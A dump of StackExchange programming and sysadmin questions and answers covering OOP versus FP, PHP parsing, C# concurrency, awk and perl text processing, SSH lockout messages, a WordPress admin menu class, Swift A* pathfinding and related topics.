_softwareengineering.348715 | Reading through a scathing article on the downsides of OOP in favour of some other paradigm I've run into an example that I can't find too much fault with. I want to be open to the author's arguments, and although I can theoretically understand their points, one example in particular I'm having a hard time trying to imagine how it would be better implemented in, say, a FP language.From: http://www.smashcompany.com/technology/object-oriented-programming-is-an-expensive-disaster-which-must-end// Consider the case where SimpleProductManager is a child of// ProductManager:public class SimpleProductManager implements ProductManager { private List products; public List getProducts() { return products; } public void increasePrice(int percentage) { if (products != null) { for (Product product : products) { double newPrice = product.getPrice().doubleValue() * (100 + percentage)/100; product.setPrice(newPrice); } } } public void setProducts(List products) { this.products = products; }}// There are 3 behaviors here:getProducts()increasePrice()setProducts()// Is there any rational reason why these 3 behaviors should be linked to// the fact that in my data hierarchy I want SimpleProductManager to be// a child of ProductManager? I can not think of any. I do not want the// behavior of my code linked together with my definition of my data-type// hierarchy, and yet in OOP I have no choice: all methods must go inside// of a class, and the class declaration is also where I declare my// data-type hierarchy:public class SimpleProductManager implements ProductManager// This is a disaster.Note that I am not looking for a rebuttal for or against the writer's arguments for Is there any any rational reason why these 3 behaviours should be linked to the data hierarchy?.What I'm specifically asking is how would this example be modelled/programmed in a FP language (Actual code, not theoretically)? | How would this be programmed in non-OO? | object oriented;functional programming | In FP style, Product would be an immutable class, product.setPrice would not mutate a Product object but return a new object instead, and the increasePrice function would be a standalone function. Using a similar looking syntax like yours (C#/Java like), an equivalent function could look like this: public List increasePrice(List products, int percentage) { if (products != null) { return products.Select(product => { double newPrice = product.getPrice().doubleValue() * (100 + percentage)/100; return product.setPrice(newPrice); }); } else return null;}As you see, the core is not really different here, except the boilerplate code from the contrived OOP example is omitted. However, I don't see this as evidence that OOP leads to bloated code, only as evidence for the fact if one constructs a code example which is sufficiently artificial enough, it is possible to prove anything. |
_unix.149100 | How can you hide unwanted apps from the gnome app menu?I've installed alacarte/main menu, unticked the apps but they still appear.I've also checked in /usr/share/applications and viewed one the apps I don't want to appear and it says NoDisplay=true but still it shows. | Remove icons in gnome application menu | gnome3;icons;menu | null |
_codereview.159841 | I'm new to PHP, having coded in Perl and ColdFusion years ago. In the process of trying to familiarize myself with my new job, I have found some code that would neither seem efficient nor logical, although it does execute properly. I would like to get feedback about whether one particular piece of code is poorly done, or whether there is in fact a reason it was done this way that is not apparent to someone new to PHP. The code reads in the contents of a text file, and then sets variables from that file. The input file contains customer records, with fields/columns delineated by commas and rows delineated by line breaks. After the variables are set, they are sliced and diced in various ways, and at the end of each foreach block, a row is appended to another text file. The data in the input text file might look something like this:123456789,MOSName,Bob,Jones,2012 Parakeet Lane999999999,OtherMOSName,Samantha,Smith,1212 Whatever Street236751235,YetAnotherMOSName,Tom,Baker,555 Blahblah Boulevard and so on.The below code only includes what is essential to understand the question.$openit = file('thedirectory/thefilename.txt');foreach($openit as $values) { //acct[0] $acct = explode(',', $values, 2); //mos[1] $mos = explode(',', $values, 3); //f_name[2] $f_name = explode(',', $values, 4); //l_name[3] $l_name = explode(',', $values, 5); //addr[4] $addr = explode(',', $values, 6);...and so on, for 26 variables.My inclination would be to simply explode the string once for each row, and place each value in a variable, like:list($acct, $mos, $f_name, $l_name, $addr) = explode(,, $values);But instead each variable is being set as an array of N items, where N is the limit attribute of explode, and where the final item includes the entire rest of the string. Then the actual piece of data is being referenced in the rest of the file using the element of that array where the relevant info is actually stored. So, acct would be referenced later on in the code as $acct[0], mos would be referenced as $mos[1], etc.Is this as inefficient and illogical as it seems? Or what am I missing here? If it is indeed an odd way of doing things, what would have been the motivation to do it this way? | Setting variables from a text file | php;array | null |
_codereview.2025 | The ConcurrentDictionary<T,V> in .NET 4.0 is thread safe but not all methods are atomic.This points out that:... not all methods are atomic, specifically GetOrAdd and AddOrUpdate. The user delegate that is passed to these methods is invoked outside of the dictionary's internal lock.Example Problem:It is possible for the delegate method to be executed more than once for a given key.public static readonly ConcurrentDictionary<int, string> store = new ConcurrentDictionary<int, string>();[TestMethod]public void UnsafeConcurrentDictionaryTest(){ Thread t1 = new Thread(() => { store.GetOrAdd(0, i => { string msg = Hello from t1; Trace.WriteLine(msg); Thread.SpinWait(10000); return msg; }); }); Thread t2 = new Thread(() => { store.GetOrAdd(0, i => { string msg = Hello from t2; Trace.WriteLine(msg); Thread.SpinWait(10000); return msg; }); }); t1.Start(); t2.Start(); t1.Join(); t2.Join();}The result shown in the Trace window shows Hello from t1 and Hello from t2. This is NOT the desired behavior for most implementations that we are using and confirms the problem noted in the MSDN link above. What we want is for only one of those delegates to be executed.Proposed Solution:I have to use the delegate overloads of these methods which led me to investigate this matter further. I stumbled onto this post which suggests using the Lazy<T> class to ensure the delegate is only invoked once. With that in mind I wrote the following extension methods to mask the adding of a Lazy<T> wrapper to the value.public static V GetOrAdd<T, U, V>(this ConcurrentDictionary<T, U> dictionary, T key, Func<T, V> valueFactory)where U : Lazy<V>{ U lazy = dictionary.GetOrAdd(key, (U)new Lazy<V>(() => valueFactory(key))); return lazy.Value;}public static V AddOrUpdate<T, U, V>(this ConcurrentDictionary<T, U> dictionary, T key, Func<T, V> addValueFactory, Func<T, V, V> updateValueFactory)where U : Lazy<V>{ U lazy = dictionary.AddOrUpdate(key, (U)new Lazy<V>(() => addValueFactory(key)), (k, oldValue) => (U)new Lazy<V>(() => updateValueFactory(k, oldValue.Value))); return lazy.Value;}Testing Solution:Executing the same test above using a ConcurrentDictionary that has a Lazy value results in the value delegate ONLY being executed once (you either see Hello from t1 or Hello from t2)! public static readonly ConcurrentDictionary<int, Lazy<string>> safeStore = new ConcurrentDictionary<int, Lazy<string>>();So it seems that this approach accomplished the goal.What do you think of this approach? | Extension methods to make ConcurrentDictionary GetOrAdd and AddOrUpdate thread safe when using valueFactory delegates | c#;thread safety | Allowing the caller to provide the type argument U implies that they are allowed to use a subclass of Lazy<V>, but this will not work as your implementations always creates a new List<V> and cast it to U. Since this means U must always be a Lazy<V> then why not do away with the extra type argument.public static V GetOrAdd<T, V>(this ConcurrentDictionary<T, Lazy<V>> dictionary, T key, Func<T, V> valueFactory)The name of the new extension methods conflict with the names of the existing methods. For the consumer to use yours instead of the existing methods, they would need to either access via your static class or use explicit type arguments. This could lead to subtle bugs when consumers try to use it as a extension method with type inference.ExtensionHost.GetOrAdd(safeStore, 7, (i) => i.ToString()); // uses yourssafeStore.GetOrAdd<int, Lazy<string>, string>(6, (i) => i.ToString()); // uses yourssafeStore.GetOrAdd(5, (i) => i.ToString()); // uses existing |
_codereview.54093 | I am implementing a Point in polygon algorithm.Inputs:M, N: size of the matrixpoly: a list of tuples that represent the points of polygon. Output:A mask matrix which is ones everywhere, except the point in the polygon should be 0.import numpy as npimport cv2def getABC(x1, y1, x2, y2): A = y2 - y1 B = x1 - x2 C = A*x1 + B*y1 return (A, B, C)def polygon(M, N, poly): out = np.ones((M, N))*255 n = len(poly) for i in range(M): intersection_x = i intersection_y = [] # check through all edges for edge in range(n + 1): v1_x, v1_y = poly[edge % n] v2_x, v2_y = poly[(edge + 1) % n] A1, B1, C1 = getABC(v1_x, v1_y, v2_x, v2_y) A2 = 1 B2 = 0 C2 = i # find intersection det = A1*B2 - A2*B1 if (det != 0): tmp = (A1 * C2 - A2 * C1)/det if tmp >= min(v1_y, v2_y) and tmp <= max(v1_y, v2_y): intersection_y.append(tmp) intersection_y = list(set(intersection_y)) print intersection_y if len(intersection_y) == 1: intersection_y.append(intersection_y[0]) for k in range(1, len(intersection_y), 2): out[intersection_x, intersection_y[k - 1]:intersection_y[k]] = 0 return outpoly = [(10,20), (10,40), (30,20), (30,40)]out = polygon(100,100, poly)cv2.imwrite(out.png, out)Is this the optimal algorithm? I use a scanning line, find the intersection with edges and make all the point between the intersections to be zero. | Point in a polygon algorithm | python;algorithm;matrix;numpy;computational geometry | null |
_unix.387880 | On my ssh server, I'm trying to hide the existence of all the users except for one. For any user besides that one user, I will get a Password: prompt which will never allow the user to enter. That's good. But for real users, after a certain number of attempts it will start printing Account locked due to XX failed logins. It will not do this for the non-existant users. How can I disable this message? | SSH account locking reveals real users | ssh;pam;access control | The message Account locked due to XX failed logins is the result of your using pam_tally (most probably pam_tally2). Just comment the corresponding lines in your PAM configuration files. |
_unix.277545 | I want to search each record (records are defined by blank lines) in a file for the pattern NAME#AAAA. If it matches, then insert an # in front of the record's age and insert a line age NIL at the end of the record. INPUT FILE:NAME#AAAASTD 1SEC AAGE 5NAME#BBBBSTD 2SEC BAGE 6NAME#CCCCSTD 3SEC CAGE 7NAME#AAAASTD 4AGE 9NAME#AAAASTD 7SEC AAGE 12EXPECTED OUTPUTNAME#AAAASTD 1SEC A#AGE 5AGE NILNAME#BBBBSTD 2SEC BAGE 6NAME#CCCCSTD 3SEC CAGE 7NAME#AAAASTD 4#AGE 9AGE NILNAME#AAAASTD 7SEC A#AGE 12AGE NIL | I want to search and replace a pattern | text processing;awk;sed | Whenever you see records separated by blank lines (paragraphs, if you like), Perl's paragraph mode is often a good solution:$ perl -00lpe 'if(/NAME#AAAA/){s/\bAGE\s/#$&/; s/$/\nAGE NIL/;}' fileNAME#AAAASTD 1SEC A#AGE 5AGE NILNAME#BBBBSTD 2SEC BAGE 6NAME#CCCCSTD 3SEC CAGE 7NAME#AAAASTD 4#AGE 9AGE NILNAME#AAAASTD 7SEC A#AGE 12AGE NILExplanation-00 : this activates perl's paragraph mode, where each paragraph (group of non-blank lines until a blank one) is treated as a line.-l : removes trailing newlines from each input record (each paragraph) and adds a newline to each print call.-pe : print each input record aftrer applying the script given by -e to it. So, those flags make perl read over the input file, applying the script to each record, and then printing the result. The script itself does:if(/NAME#AAAA/) : if this record matches NAME#AAAA.s/\bAGE\s/#$&/ : The s/foo/bar/ is the substitution operator. It will replace foo with bar. Here, I am replacing AGE with itself preceded by a #. The \b matches word boundaries, and will exclude things like ADAGE from the match. The $& is a special variable and means whatever was matched. So, s/\bAGE\s/#$&/ will replace AGE with #AGE. s/$/\nAGE NIL/ : The $ matches the end of the record. So replacing it with something else will append to the end of the record. This command appends AGE NIL to the end of the matched record. Note that all operations here are case sensitive. If you need case insensitive matching use this instead:perl -00lpe 'if(/NAME#AAAA/i){s/\bAGE\s/#$&/i; s/$/\nAGE NIL/i;}' file |
_hardwarecs.2702 | Looking at recommendations for a graphics card that fulfills the following spec in order of importance:Dual 4K (60hz) capablePassive cooledCheap (only business graphics required)Two displayport/ mini display port connectorsAMD chipset | Passive cooled graphics card for dual 4K screens | graphics cards;pc;cooling | null |
_codereview.154525 | I have recently delved into the world of OOP programming with PHP. I wanted to add my own custom menu to the Wordpress Admin area, and came across a tutorial, which I have followed, and the code is currently working.What I would like to know, is whether this is the correct way to go about it, is it secure (since it deals with storing stuff in the Database) and can it be improved upon.class AddMenu extends TheGlobalSettings {public $default = array( 'slug' => '', 'title' => '', 'page_title' => '', 'parent' => null, 'id' => '', 'capability' => 'manage_options', 'icon' => 'dashicons-hammer', 'position' => null, 'desc' => '', 'function' => '' );public $parentID = null;public $menu_options = array();function __construct( $options ) { $this->menu_options = array_merge( $this->default, $options ); if( $this->menu_options['slug'] == '' ) : return; endif; $this->settings_id = $this->menu_options['slug']; $this->prepopulate(); add_action( 'admin_menu', array( $this, 'add_page' ) ); add_action( 'wordpressmenu_page_save_' . $this->settings_id, array( $this, 'save_settings' ) );}public function prepopulate() { if( $this->menu_options['title'] == '') : $this->menu_options['title'] = ucfirst( $this->menu_options['slug'] ); endif; if( $this->menu_options['page_title'] = '' ) : $this->menu_options['page_title'] = $this->menu_options['title']; endif;}public function add_page() { $functionToUse = $this->menu_options['function']; if( $functionToUse == '' ) : $functionToUse = array( $this, 'create_menu_page' ); endif; if( $this->parent_id != null ) : add_submenu_page( $this->parent_id, $this->menu_options['page_title'], $this->menu_options['title'], $this->menu_options['capability'], $this->menu_options['slug'], $functionToUse ); else : add_menu_page( $this->menu_options['page_title'], $this->menu_options['title'], $this->menu_options['capability'], $this->menu_options['slug'], $functionToUse, $this->menu_options['icon'], $this->menu_options['position'] ); endif;}public function create_menu_page() { $this->save_if_submit(); $tab = 'general'; if( isset( $_GET['tab'] ) ) : $tab = $_GET['tab']; endif; $this->init_settings(); ?> <div class=wrap> <h2><?php echo $this->menu_options['page_title']; ?></h2> <?php if( !empty( $this->menu_options['desc'] ) ) : ?> <p class=description><?php echo $this->menu_options['desc']; ?></p> <?php endif;?> <?php $this->render_tabs(); ?> <form method=POST action=> <div class=postbox> <div class=inside> <table class=form-table> <?php $this->render_fields( $tab ); ?> </table> <?php $this->save_button(); ?> </div> </div> </form> </div><?php}public function render_tabs( $active_tab = 'general' ) { if( count( $this->tabs ) > 1 ) { echo '<h2 class=nav-tab-wrapper woo-nav-tab-wrapper>'; foreach ($this->tabs as $key => $value) : echo '<a href=' . admin_url('admin.php?page=' . $this->menu_options['slug'] . '&tab=' . $key ) . ' class=nav-tab ' . ( ( $key == $active_tab ) ? 'nav-tab-active' : '' ) . ' >' . $value . '</a>'; endforeach; echo '</h2>'; echo '<br/>'; }}/** * Render the save button * @return void */protected function save_button() { ?> <button type=submit name=<?php echo $this->settings_id; ?>_save class=button button-primary> <?php _e( 'Save', 'textdomain' ); ?> </button> <?php}/** * Save if the button for this menu is submitted * @return void */protected function save_if_submit() { if( isset( $_POST[ $this->settings_id . '_save' ] ) ) { do_action( 'wordpressmenu_page_save_' . $this->settings_id ); }}}class AddSubPage extends AddMenu {function __construct( $options, AddMenu $parent ) { parent::__construct( $options ); $this->parent_id = $parent->settings_id;}}class WordPressMenuTab {public $slug;public $title;public $menu;function __construct( $options, AddMenu $menu ) { $this->slug = $options['slug']; $this->title = $options['title']; $this->menu = $menu; $this->menu->add_tab( $options );}/** * Add field to this tab * @param [type] $array [description] */public function add_field( $array ){ $this->menu->add_field( $array, $this->slug );}}abstract class TheGlobalSettings {/** * ID of the settings * @var string */public $settings_id = '';/** * Tabs for the settings page * @var array */public $tabs = array( 'general' => 'General' );/** * Settings from database * @var array */protected $settings = array();/** * Array of fields for the general tab * array( * 'tab_slug' => array( * 'field_name' => array(), * ), * ) * @var array */protected $fields = array();/** * Data gotten from POST * @var array */protected $posted_data = array();public function init_settings() { $this->settings = (array) get_option( $this->settings_id ); foreach ( $this->fields as $tab_key => $tab ) { foreach ( $tab as $name => $field ) { if( isset( $this->settings[ $name ] ) ) { $this->fields[ $tab_key ][ $name ]['default'] = $this->settings[ $name ]; } } }}/** * Save settings from POST * @return [type] [description] */public function save_settings(){ $this->posted_data = $_POST; if( empty( $this->settings ) ) { $this->init_settings(); } foreach ($this->fields as $tab => $tab_data ) { foreach ($tab_data as $name => $field) { $this->settings[ $name ] = $this->{ 'validate_' . $field['type'] }( $name ); } } update_option( $this->settings_id, $this->settings ); }/** * Gets and option from the settings API, using defaults if necessary to prevent undefined notices. * * @param string $key * @param mixed $empty_value * @return mixed The value specified for the option or a default value for the option. */public function get_option( $key, $empty_value = null ) { if ( empty( $this->settings ) ) { $this->init_settings(); } // Get option default if unset. if ( ! isset( $this->settings[ $key ] ) ) { $form_fields = $this->fields; foreach ( $this->tabs as $tab_key => $tab_title ) { if( isset( $form_fields[ $tab_key ][ $key ] ) ) { $this->settings[ $key ] = isset( $form_fields[ $tab_key ][ $key ]['default'] ) ? $form_fields[ $tab_key ][ $key ]['default'] : ''; } } } if ( ! is_null( $empty_value ) && empty( $this->settings[ $key ] ) && '' === $this->settings[ $key ] ) { $this->settings[ $key ] = $empty_value; } return $this->settings[ $key ];}public function validate_text( $key ){ $text = $this->get_option( $key ); if ( isset( $this->posted_data[ $key ] ) ) { $text = wp_kses_post( trim( stripslashes( $this->posted_data[ $key ] ) ) ); } return $text; } /** * Validate textarea field * @param string $key name of the field * @return string */ public function validate_textarea( $key ){ $text = $this->get_option( $key ); if ( isset( $this->posted_data[ $key ] ) ) { $text = wp_kses( trim( stripslashes( $this->posted_data[ $key ] ) ), array_merge( array( 'iframe' => array( 'src' => true, 'style' => true, 'id' => true, 'class' => true ) ), wp_kses_allowed_html( 'post' ) ) ); } return $text; } /** * Validate WPEditor field * @param string $key name of the field * @return string */ public function validate_wpeditor( $key ){ $text = $this->get_option( $key ); if ( isset( $this->posted_data[ $key ] ) ) { $text = wp_kses( trim( stripslashes( $this->posted_data[ $key ] ) ), array_merge( array( 'iframe' => array( 'src' => true, 'style' => true, 'id' => true, 'class' => true ) ), wp_kses_allowed_html( 'post' ) ) ); } return $text; } /** * Validate select field * @param string $key name of the field * @return string */ public function validate_select( $key ) { $value = $this->get_option( $key ); if ( isset( $this->posted_data[ $key ] ) ) { $value = stripslashes( $this->posted_data[ $key ] ); } return $value; } /** * Validate radio * @param string $key name of the field * @return string */ public function validate_radio( $key ) { $value = $this->get_option( $key ); if ( isset( $this->posted_data[ $key ] ) ) { $value = stripslashes( $this->posted_data[ $key ] ); } return $value; } /** * Validate checkbox field * @param string $key name of the field * @return string */ public function validate_checkbox( $key ) { $status = ''; if ( isset( $this->posted_data[ $key ] ) && ( 1 == $this->posted_data[ $key ] ) ) { $status = '1'; } return $status; } public function add_field( $array, $tab = 'general' ) { $allowed_field_types = array( 'text', 'textarea', 'wpeditor', 'select', 'radio', 'checkbox' ); // If a type is set that is now allowed, don't add the field if( isset( $array['type'] ) &&$array['type'] != '' && ! in_array( $array['type'], $allowed_field_types ) ){ return; } $defaults = array( 'name' => '', 'title' => '', 'default' => '', 'placeholder' => '', 'type' => 'text', 'options' => array(), 'default' => '', 'desc' => '', ); $array = array_merge( $defaults, $array ); if( $array['name'] == '' ) { return; } foreach ( $this->fields as $tabs ) { if( isset( $tabs[ $array['name'] ] ) ) { trigger_error( 'There is alreay a field with name ' . $array['name'] ); return; } } // If there are options set, then use the first option as a default value if( ! empty( $array['options'] ) && $array['default'] == '' ) { $array_keys = array_keys( $array['options'] ); $array['default'] = $array_keys[0]; } if( ! isset( $this->fields[ $tab ] ) ) { $this->fields[ $tab ] = array(); } $this->fields[ $tab ][ $array['name'] ] = $array; } /** * Adding tab * @param array $array options */ public function add_tab( $array ) { $defaults = array( 'slug' => '', 'title' => '' ); $array = array_merge( $defaults, $array ); if( $array['slug'] == '' || $array['title'] == '' ){ return; } $this->tabs[ $array['slug'] ] = $array['title']; } public function render_fields( $tab ) { if( ! isset( $this->fields[ $tab ] ) ) : echo '<p>' . __( 'There are no settings on these page.', 'textdomain' ) . '</p>'; return; endif; foreach ( $this->fields[ $tab ] as $name => $field ) : $this->{ 'render_' . $field['type'] }( $field ); endforeach; } public function render_text( $field ){ extract( $field ); ?> <tr> <th> <label for=<?php echo $name; ?>><?php echo $title; ?></label> </th> <td> <input type=<?php echo $type; ?> name=<?php echo $name; ?> id=<?php echo $name; ?> value=<?php echo $default; ?> placeholder=<?php echo $placeholder; ?> /> <?php if( $desc != '' ) { echo '<p class=description>' . $desc . '</p>'; }?> </td> </tr> <?php } /** * Render textarea field * @param string $field options * @return void */ public function render_textarea( $field ){ extract( $field ); ?> <tr> <th> <label for=<?php echo $name; ?>><?php echo $title; ?></label> </th> <td> <textarea name=<?php echo $name; ?> id=<?php echo $name; ?> placeholder=<?php echo $placeholder; ?> ><?php echo $default; ?></textarea> <?php if( $desc != '' ) { echo '<p class=description>' . $desc . '</p>'; }?> </td> </tr> <?php } /** * Render WPEditor field * @param string $field options * @return void */ public function render_wpeditor( $field ){ extract( $field ); ?> <tr> <th> <label for=<?php echo $name; ?>><?php echo $title; ?></label> </th> <td> <?php wp_editor( $default, $name, array('wpautop' => false) ); ?> <?php if( $desc != '' ) { echo '<p class=description>' . $desc . '</p>'; }?> </td> </tr> <?php } /** * Render select field * @param string $field options * @return void */ public function render_select( $field ) { extract( $field ); ?> <tr> <th> <label for=<?php echo $name; ?>><?php echo $title; ?></label> </th> <td> <select name=<?php echo $name; ?> id=<?php echo $name; ?> > <?php foreach ($options as $value => $text) { echo '<option ' . selected( $default, $value, false ) . ' value=' . $value . '>' . $text . '</option>'; } ?> </select> <?php if( $desc != '' ) { echo '<p class=description>' . $desc . '</p>'; }?> </td> </tr> <?php } /** * Render radio * @param string $field options * @return void */ public function render_radio( $field ) { extract( $field ); ?> <tr> <th> <label for=<?php echo $name; ?>><?php echo $title; ?></label> </th> <td> <?php foreach ($options as $value => $text) { echo '<input name=' . $name . ' id=' . $name . ' type='. $type . ' ' . checked( $default, $value, false ) . ' value=' . $value . '>' . $text . '</option><br/>'; } ?> <?php if( $desc != '' ) { echo '<p class=description>' . $desc . '</p>'; }?> </td> </tr> <?php } /** * Render checkbox field * @param string $field options * @return void */ public function render_checkbox( $field ) { extract( $field ); ?> <tr> <th> <label for=<?php echo $name; ?>><?php echo $title; ?></label> </th> <td> <input <?php checked( $default, '1', true ); ?> type=<?php echo $type; ?> name=<?php echo $name; ?> id=<?php echo $name; ?> value=1 placeholder=<?php echo $placeholder; ?> /> <?php echo $desc; ?> </td> </tr> <?php }}$newMenu = new AddMenu( array( 'slug' => 'sitesettings','title' => 'Site Settings','desc' => '','icon' => '','position' => 5));$newMenu->add_field(array('name' => 'text','title' => 'Text Input','desc' => '' ));$customTab = new WordPressMenuTab( array( 'slug' => 'example_tab', 'title' => 'Example Tab' ), $newMenu ); | Custom WordPress Menu | php;security;wordpress | null |
_unix.163439 | There is an input file that has TAB delimited columns. We need to remove the lines which has NA for the fourth AND the eleventh column. Question: how can we do this in awk? | How to exclude lines that has given columns? | text processing;awk | awk -F\t '$4 != NA || $11 != NA' filenameNote, awk does not edit the file in-place. If you want to save the changes back to the file, then:tmp=$(mktemp)awk -F\t '...' filename > $tmp && mv $tmp filename |
_unix.228532 | I have a file that looks like:1 rs6687776 1020428 T C T C T C C C T C C C T CThe 4th and 5th column are the two different possible alleles at that site. I need to change column 6 onwards so as to show 0 if there is a T allele and 1 if there is a C allele. My file is 20805 x 459. So should look like:1 rs6687776 1020428 T C 0 1 0 1 1 1 0 1 1 1 0 1I've tried:cat file | while read linedo if [ [,6-] = [,4] ]then echo 0 echo 1fidoneBut I just end up with a file of alternating 0's and 1's that is 41610 rows long. Maybe AWK is more useful? | Convert genotypes to 0/1 | text processing;awk;replace | Here's another awk approach:$ awk '{a[$4]=0;a[$5]=1; for(i=6;i<=NF;i++){$i=a[$i]}}1;' file1 rs6687776 1020428 T C 0 1 0 1 1 1 0 1 1 1 0 1Explanationa[$4]=0;a[$5]=1; : creates the array a with two keys, $4 and $5. The value for $4 is set to 0 and that of $5 to 1. for(i=6;i<=NF;i++){$i=a[$i]} : for each field number from 6 to the last one, set that field to whatever is stored in the array for the nucleotide found. 1; : awk shorthand for print this line.You could also do it with Perl:$ perl -lane 's/$F[3]/0/ for @F[5..$#F]; s/$F[4]/1/ for @F[5..$#F]; print @F' file1 rs6687776 1020428 T C 0 1 0 1 1 1 0 1 1 1 0 1This is the same idea. The -a makes perl act like awk, splitting each line on whitespace into the array @F. We then substitute all cases of the nucleotide found in the 4th field ($F[3], arrays start at 0) with 0 and all cases of the 5th ($F[4]) with 1. The for @F[5..$#F] means that the substitution is only applied for fields 6 to last. Finally, the modified array is printed. |
_vi.8298 | I am trying to use KBC Poker 3 keyboard which combines `,~ and <Esc> as one key with Vim and wondering if it is possible to use the quick press of the escape key as char '`', and long press of escape key (longer than 500ms) as escape key. Is it possible? | Use the same key for `, ~, esc | keyboard layout | As far as I know there is no built-in support for mappings that change based on the time you hold the key.But as the problematic key is Esc, you have some good alternatives:Use Ctrl+[, which works by default (as explained in :help key-codes):<Esc> escape CTRL-[ 27 *escape* *<Esc>*As Esc is a heavily used key in Vim, many people use mappings for it, such as jj, jk, or CapsLock:Reaching up to hit the escape key sucksDo you remap your Escape key?Learn Vimscript the Hard Way - chapter 10If you choose to remap the CapsLock (as I did myself), you may find the capslock plugin useful. |
_codereview.72106 | I'm new to the Swift language. I have a C# version of a simple A* route which is very fast. But I rewrote it with Swift, and the performance is very bad (3,4 seconds for a very simple road).Could someone give me some suggestions? What I thought is that, the loop and compares logic spends most of the time.Here is the entire project.When the app launches, the screen is covered with many white blocks. You could touch on it to switch color to red, blue, yellow etc. Red means blocks; blue means start point; yellow means destination point. We could simply set a point to blue and a yellow from lower left corner to upper right corner; once the yellow color is set, I will execute the route logic; you will see how slow it is.import Foundationimport SpriteKitpublic class RouteManager { public init(column : Int, row : Int) { var matrix = [[Bool]]() for var r : Int = 0; r <= row; r++ { var oneRow = [Bool]() for var c : Int = 0; c <= column; c++ { oneRow.append(false) } matrix.append(oneRow) } self.matrix = matrix self.costCalc = SimpleCostCalc() } public required init (matrix : [[Bool]]) { self.matrix = matrix self.costCalc = SimpleCostCalc() } public var matrix : [[Bool]] public var costCalc : CostCalcProtocal!; public func route(start : PointInt, destination : PointInt) -> [PointInt]? { let map = RectInt(x: 0, y: 0, width: matrix[0].count, height: matrix.count) if(!map.contains(start) || !map.contains(destination)) { return nil } let routeData = RouteData(rect: map, destination: destination) let startNode = AStarNode(location: start, previousNode: nil, costG: 0, costH: 0) routeData.openedNodes.append(startNode) var currentNode = startNode return routeCore(routeData, currentNode: currentNode) } func routeCore (routeData : RouteData, currentNode : AStarNode) -> [PointInt]? { let start = NSDate() for direction in routeData.directions { let nextLocation = currentNode.location.getAdjecentPoint(direction) if !routeData.rect.contains(nextLocation) { continue } if matrix[nextLocation.y][nextLocation.x] { continue } let costG = costCalc.getCostG(currentNode, direction: direction) let costH = costCalc.getCostH(nextLocation, destination: routeData.destination) if costH == 0 { var result = [PointInt]() result.append(routeData.destination) result.insert(currentNode.location, atIndex: 0) var tempNode = currentNode while (tempNode.previousNode != nil) { result.insert(tempNode.previousNode!.location, atIndex: 0) tempNode = tempNode.previousNode! } return result } let existingNode = getNodeOnLocation(nextLocation, routeData: routeData) if((existingNode?) != nil) { if(existingNode!.costG > costG) { existingNode!.previousNode = currentNode existingNode!.costG = costG } } else { let newNode = AStarNode(location: nextLocation, previousNode: currentNode, costG: costG, costH: costH) routeData.openedNodes.append(newNode) } } let currentNodeIndex = indexOf(routeData.openedNodes, item: currentNode) routeData.openedNodes.removeAtIndex(currentNodeIndex) routeData.closedNodes.append(currentNode) println(routeData.openedNodes.count) let minimumCostNode = getMinimumCostNode(routeData) if minimumCostNode == nil { return nil } return routeCore(routeData, currentNode: minimumCostNode!) } func getMinimumCostNode(routeData : RouteData) -> AStarNode? { var node : AStarNode? = nil if(routeData.openedNodes.count != 0) { for n in routeData.openedNodes { if node == nil { node = n } else if node?.costF > n.costF { node = n } } } return node } func getNodeOnLocation (location:PointInt, routeData : RouteData) -> AStarNode? { for node in routeData.openedNodes { if node.location.x == location.x && node.location.y == location.y { return node; } } for node in routeData.closedNodes { if node.location.x == location.x && node.location.y == location.y { return node } } return nil } func indexOf (items : [AStarNode], item : AStarNode) -> Int { var result = -1 for var index = 0; index < items.count; index++ { if items[index] === item { result = index break } } return result }} | Performance of A* route | beginner;performance;pathfinding;swift | Without a clue as to what is actually running slow and without enough code to actually compile and time profile myself, the first thing that stands out to me is your nested loop in init.Why don't we replace that nested loop with the following:self.matrix = [[Bool]](count: row, repeatedValue:[Bool](count: column, repeatedValue: false))We have a variable, costCalc, which is of type CostCalcProtocal! (it's spelled protocol by the way). But there are problems with this...First of all, all of our init messages initialize it to SimpleCostCalc(). Why don't we just put this at the variable declaration?public var costCalc: CostCalcProtocal! = SimpleCostCalc()And we are we abbreviating so much? I've never once heard autocomplete complain about helping me make my code more readable:public var costCalculator: CostCalculatorProtocol! = SimpleCostCalculator()Much better.But there's still problems here.The question is, do we want to allow the user to set the cost calculator? This looks a bit like a protocol-delegate pattern, so perhaps we do. If this is what we want, using the forced unwrapped optional is bad. It allows the user to set this variable to nil and crash when you try to access it. For example:let routeManager = RouteManager(column: 3, row: 4)routeManager.costCalc = nillet result = routeManager.routeCore(routeData: foo, currentNode: bar)This will crash.The explicitly unwrapped optional is saying this variable should never be nil... but the fact that it's an optional means it could be nil (and you can set it nil and nothing prevents that). And the fact that it's forced unwrapped instead of optionally unwrapped means you get a crash.So, if we want to let the user set it, we have two options:public var costCalculator: CostCalculatorProtocol = SimpleCostCalculator()public weak var costCalculator: CostCalculatorProtocol? = SimpleCostCalculator()The first option means non-optional. We will always have a valid costCalculator object.The second option means optional. It could possible be nil, but because it's optional with the question mark, that's okay--we'll be checking it for nil every step of the way.But there's also that word weak there. This may or may not be necessary.If we're following a typical protocol-delegate pattern, this is almost certainly necessary. In most cases, a delegate has a reference to the object it is delegating. If the delegate has a strong reference to the delegated object, and the delegated object has a strong reference back to the delegate, we've created what's called a retain-cycle. Neither object will ever be released by ARC--they'll be kept in memory forever.Making the variable a weak, optional means that if the cost calculator has no other strong references to it, our reference to it will be nil-ed out as it deallocates (and if it was the only strong reference to us, we'll deallocate as well, appropriately). |
_webapps.19840 | I've noticed that pages where I have marked with +1 have You +1'd this in Google search results. However, it doesn't seem to affect the order of results, or there may be very small differences I can't see or notice.How do I get pages marked +1 on top of other search results?I was thinking of using it like a read it later or similar service. Like when I mark web pages read it later, but never read them. If +1 marked pages appear on top of search result, it may be the time to read them. | How do I get pages marked +1 in Google search results to rise to the top? | google search;google plus 1 | According to this WIRED article, +1 Google is investigating wether to consider it as a signal in future updates of the search engine.Google confirmed its plans in an e-mail to Wired.com.Google will study the clicks on +1 buttons as a signal that influences the ranking and appearance of websites in search results, a spokesman wrote. The purpose of any ranking signal is to improve overall search quality. For +1s and other social ranking signals, as with any new ranking signal, well be starting carefully and learning how those signals are related to quality.So, for now at list, the pages you are +1-ing will not change ranking. |
_unix.277162 | I am experiencing an issue with a indexing program running much longer than expected. I want to rule out the possibility of a recursive symbolic link. How could I find a symbolic link that is recursive at some level? | How could I quickly find a recursive symbolic link? | find;symlink;recursive | null |
